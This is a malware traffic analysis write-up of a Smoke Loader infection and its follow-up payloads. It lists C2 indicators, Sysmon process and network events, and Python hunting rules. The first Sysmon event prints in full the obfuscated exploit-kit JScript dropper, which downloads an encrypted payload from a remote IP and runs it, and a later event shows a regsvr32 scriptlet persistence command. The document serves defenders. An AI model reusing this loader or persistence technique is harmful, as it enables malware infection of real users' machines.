Three days of a Smoke Loader infection and follow-up malware

Smoke Loader is a malicious bot application that can be used to load other malware. Smoke Loader has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. – https://attack.mitre.org/software/S0226/

I have added a zipped pcap file for your analysis. The password for the zipped pcap is "infected" (all lowercase).

PCAP file of the infection traffic:
2019-11-24-SmokeLoader-pcap.zip

[ASSOCIATED DOMAINS – DAY 1]
94.130.90.228 – atztds45.club GET /dj398ghw874rhq2yrd – REDIRECT TO RIG EK
62.109.9.21 – GET /?MjA1MTEw&BUxq&oPMRaGO=filly – RIG EK
192.64.119.112 – blogserv27.com POST /blogpics17/ – SMOKE LOADER C2
198.54.117.216 – www.blogserv27.com GET /blogpics17/?from=@ – SMOKE LOADER C2
5.101.181.110 – blogserv279.club POST /blogpics17/ – SMOKE LOADER C2
192.64.119.111 – kxserv250.club POST /blogpics17/ – SMOKE LOADER C2
198.54.117.212 – www.kxserv250.club POST /blogpics17/ – SMOKE LOADER C2
185.222.202.235 – dsmail94x.xyz POST /blogpics17/ – SMOKE LOADER C2

[ASSOCIATED DOMAINS – DAY 2]
192.64.119.112 – blogserv27.com POST /blogpics17/ – SMOKE LOADER C2
198.54.117.215 – www.blogserv27.com GET /blogpics17/?from=@ – SMOKE LOADER C2
185.205.210.118 – pstarserver17km.xyz GET /socks111atx.exe – SMOKE LOADER UPDATE
185.205.210.118 – pstarserver17km.xyz GET /pred777amx.exe – PREDATOR THE THIEF PAYLOAD
67.43.224.142 – POST /api/check.get – PREDATOR THE THIEF C2
67.43.224.142 – POST /api/gate.get?p1= – PREDATOR THE THIEF C2
192.236.161.230 – cs-server1.biz GET /forums/gate.php – UNKNOWN C2

nadvexmail19mn.xyz – UNRESOLVED DNS QUERY

[UNUSUAL USER-AGENT]
GET /forums/gate.php HTTP/1.1
User-Agent: zAL4AbYO/3JKdXwe+CYUn1adJINsbgLas1XvzK57KxbdcGj7sjtUcih3VeEpnSc1QYQeav0+xo3UWd+f3x9tMZQU4l0P9vLpa/jPBGOQzFtyTPHJc7iXX6ikMkaJzpFU
Host: cs-server1.biz

[ASSOCIATED DOMAINS – DAY 3]
192.236.161.230 – cs-server1.biz GET /forums/gate.php – UNKNOWN C2
192.64.119.112 – blogserv27.com POST /blogpics17/ – SMOKE LOADER C2
198.54.117.210 – www.blogserv27.com GET /blogpics17/?from=@ – SMOKE LOADER C2
5.101.181.110 – blogserv279.club POST /blogpics17/ – SMOKE LOADER C2
185.205.210.118 – pstarserver17km.xyz GET /socks111atx.exe – SMOKE LOADER UPDATE
185.205.210.118 – pstarserver17km.xyz GET /sky/new/dos777.exe – SUSPECTED MEDUSAHTTP PAYLOAD
131.188.40.189 – GET /tor/status-vote/current/consensus – TOR TRAFFIC
195.22.26.248 – csseverapi.biz POST /admin/users/login/api/api.jsp – MEDUSAHTTP C2
192.236.161.230 – greenboolinfo.com POST /admin/users/login/api/api.jsp – MEDUSAHTTP C2
192.236.161.230 – cs-server1.biz GET /forums/gate.php – UNKNOWN C2

moolficapi.world – UNRESOLVED DNS QUERY

ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:

[SYSMON EVENT 1 – RIG EK EXPLOITING IEXPLORE.EXE, WHICH SPAWNS CMD.EXE TO CALL FOR THE PAYLOAD]
Image C:\Windows\System32\cmd.exe
CommandLine CMd.exe /q /c cd /d "%%tmp%%" && echo function Q(n,g){for(var c=0,s=String,d,D="pus"+"h",b=[],i=[],r=254+1,a=0;r+1^>a;a++)b[a]=a;for(a=0;r+1^>a;a++)c=c+b[a]+g[v](a%%g["length"])^&r,d=b[a],b[a]=b[c],b[c]=d;for(var e=c=a=0,O="fromC",S=O+"harCode";e^<n.length;e++)a=a+1^&r,c=c+b[a]^&r,d=b[a],b[a]=b[c],b[c]=d,i[D](s[S](n[v](e)/**/^^b[b[a]+b[c]^&r]));return i[u(15)](u(11))};E="WinHTTPIRequest.5.1IGETIScripting.FileSystemObjectIWScript.ShellIADODB.StreamIeroI.exeIGetTempNameIcharCodeAtIiso-8859-1IIindexOfI.dllIScriptFullNameIjoinIrunI /c I /s ",u=function(x){return E["split"]("I")[x]},J=ActiveXObject,W=function(v){return new J(v)};try{var q=W(u(3)),j=W(u(4)),s=W(u(5)),p=u(7),n=0,U=1?[1,this[""+"WScr"+"ipt"]]:0;U=U[1],L=U[u(14)],v=u(9),m=U["Ar"+"guments"];s.Type=2;c=q[u(8)]();s.Charset=u(012);s["Open"]/**/();i=H(m);d=i[v](i[u(12)]("PE\x00\x00")+027);s["writetext"](i);if(037^<d){var z=1;c+=u(13)}else c+=p;K="saveto";s[K+"file"](c,2);s.Close();z^&^&(c="Regsvr32"+p+u(18)+c);j.run("cmd"+p+" /c "+c,0)}catch(DD){}q.Deletefile(L);function H(g){var T=u(0),d=W(T+"."+T+u(1));d["SetProxy"](n);d["Op"+"en"](u(2),g(1),n);d["Option"](0)=g(2);d["Send"];if(0310==d.status)return Q(d.responseText,g(n))};>n.t && stArT wsCripT //B //E:JScript n.t "L1ZytEdfgdg" "http://62.109.9.21/?MTAyNTAw&kBJ&WrDD=disagree&zQQpAn=abettor&JYSMM=difference&KLZKCcS=irreverent&cNgONR=abettor&DTWveM=neighboring&JwXZjNOB=filly&rzSyavrX=community&ffd3dfdfs=xHbQMrnYbRfFFYTfKPLEUKNEMUbWA0GKwYaZhanVF5axFDDGpbv1FxvspVqdCFuEmvtvdLQHIwqh1ULASww0mY&t4gdfdff4=dcUFxGpKH4ikiDmhGd1Z-H_BKIZgNF-JXDQbYy0VryybgXJc0lwR7T4WhQmO0tW10W5A0Um6jLFKj58EYwV0QC&RlPMr=dinamic&GIyFYp=border&qMP=professional&OdPXa=callous&uwVuNTk2MTMx" "ยค"
CurrentDirectory C:\Users\Robert\Desktop\
User Robert-PC\Robert
Hashes MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE
ParentImage C:\Program Files\Internet Explorer\iexplore.exe
ParentCommandLine "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2108 CREDAT:144385 /prefetch:2

[Original Payload]
Image C:\Users\Robert\AppData\Local\Temp\rad27EA4.tmp.exe
CommandLine rad27EA4.tmp.exe
CurrentDirectory C:\Users\Robert\AppData\Local\Temp\
Hashes MD5=67E99ABB3FF2880CDA897899D426F7D1,SHA256=CB9B359B8791692FDCAE0FD36ECE6D4484BE1B39EC75C1D49EA7BE1816576A36
ParentImage C:\Windows\System32\cmd.exe
ParentCommandLine "C:\Windows\System32\cmd.exe" /c rad27EA4.tmp.exe

[Sysmon Event 2 – Hollowed Explorer.exe changing the creation time of its dropped file]
Image C:\Windows\Explorer.EXE
TargetFilename C:\Users\Robert\AppData\Roaming\wbttadv
CreationUtcTime 2019-03-02 01:30:12.015
PreviousCreationUtcTime 2019-11-22 00:40:32.967

[Sysmon Event 3 – Explorer.exe communicating with Smoke Loader C2]
Image C:\Windows\explorer.exe
SourceIp 192.168.137.237
DestinationIp 198.54.117.216
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 3 – Explorer.exe communicating with Smoke Loader C2]
Image C:\Windows\explorer.exe
SourceIp 192.168.137.237
DestinationIp 5.101.181.110
DestinationHostname
DestinationPort 80
DestinationPortName http

[Sysmon Event 1 – Smoke Loader Scheduled Task persistence via regsvr32 scriptlet]
Image C:\Windows\System32\regsvr32.exe
CommandLine C:\Windows\system32\regsvr32.EXE /s /n /u /i:"C:\Users\Robert\AppData\Roaming\tuvragt" scrobj
CurrentDirectory C:\Windows\system32\
Hashes MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B
ParentImage C:\Windows\System32\taskeng.exe
ParentCommandLine taskeng.exe {0D882FD4-FA3D-418B-BAC2-54AAA48594D7}

[Sysmon Event 3 – TeamViewer communicating with Smoke Loader C2]
Image C:\Users\Robert\AppData\Local\Temp\7869.tmp\TeamViewer.exe
Protocol tcp
DestinationIp 5.101.181.110
DestinationHostname scd103df0.fastvps-server.com
DestinationPort 80
DestinationPortName http


Shown above: TeamViewer was also found to be installed and was observed communicating with the Smoke Loader C2.
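The process and network events above translate into a small set of endpoint hunting rules. The following is an added example, not code from the original post: it runs three such rules (browser-spawned JScript loader, regsvr32 scriptlet persistence from %APPDATA%, explorer.exe beaconing to a public IP) over constructed Sysmon-style records that reuse this write-up's values for the positive cases, plus a check for the base64-style User-Agent seen on the cs-server1.biz request. The record layout, rule names and the RFC1918 filter are assumptions.

```python
import re
# Constructed sample records in the key/value layout of the Sysmon events above; the first three reuse
# values from this write-up (positive cases), the last is a benign regsvr32 control that must not fire.
SAMPLE_EVENTS = [
    {"EventId": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": r'CMd.exe /q /c cd /d "%%tmp%%" && echo function Q(n,g){...}>n.t && stArT wsCripT //B //E:JScript n.t "L1ZytEdfgdg" "http://62.109.9.21/?MTAyNTAw"'},
    {"EventId": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\taskeng.exe",
     "CommandLine": r'C:\Windows\system32\regsvr32.EXE /s /n /u /i:"C:\Users\Robert\AppData\Roaming\tuvragt" scrobj'},
    {"EventId": 3, "Image": r"C:\Windows\explorer.exe", "DestinationIp": "198.54.117.216",
     "DestinationHostname": "", "DestinationPort": "80"},
    {"EventId": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\helper.dll"},
]

RFC1918 = re.compile(r"^(10\.|127\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)")
# A User-Agent that is one long base64-style token, like the cs-server1.biz request above.
OPAQUE_UA = re.compile(r"^[A-Za-z0-9+/]{48,}={0,2}$")

def image_is(ev, key, name):
    return ev.get(key, "").lower().endswith("\\" + name)

def rule_browser_spawned_jscript(ev):
    """Exploit-kit chain: iexplore.exe -> cmd.exe that echoes JScript to a file and runs it via wscript //E:JScript."""
    cl = ev.get("CommandLine", "").lower()
    return (ev["EventId"] == 1 and image_is(ev, "Image", "cmd.exe") and image_is(ev, "ParentImage", "iexplore.exe")
            and "wscript" in cl and "//e:jscript" in cl)

def rule_regsvr32_scriptlet_from_roaming(ev):
    """Scheduled-task persistence: regsvr32 /s /n /u /i:<file under %APPDATA%> scrobj."""
    cl = ev.get("CommandLine", "").lower()
    return (ev["EventId"] == 1 and image_is(ev, "Image", "regsvr32.exe")
            and "scrobj" in cl and "/i:" in cl and "\\appdata\\roaming\\" in cl)

def rule_explorer_web_to_public_ip(ev):
    """Hollowed explorer.exe beaconing: HTTP(S) to a non-private IP with no resolved hostname."""
    return (ev["EventId"] == 3 and image_is(ev, "Image", "explorer.exe")
            and ev.get("DestinationPort") in ("80", "443") and not ev.get("DestinationHostname")
            and not RFC1918.match(ev.get("DestinationIp", "")))

RULES = [rule_browser_spawned_jscript, rule_regsvr32_scriptlet_from_roaming, rule_explorer_web_to_public_ip]

def hunt(events):
    """Return (rule name, Image) for every event that matches a rule."""
    return [(rule.__name__, ev["Image"]) for ev in events for rule in RULES if rule(ev)]

def is_opaque_user_agent(ua):
    """True when the User-Agent is a single base64-style token rather than a product string."""
    return bool(OPAQUE_UA.match(ua.strip()))
```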

Shown above: Some of the network traffic observed in the initial infection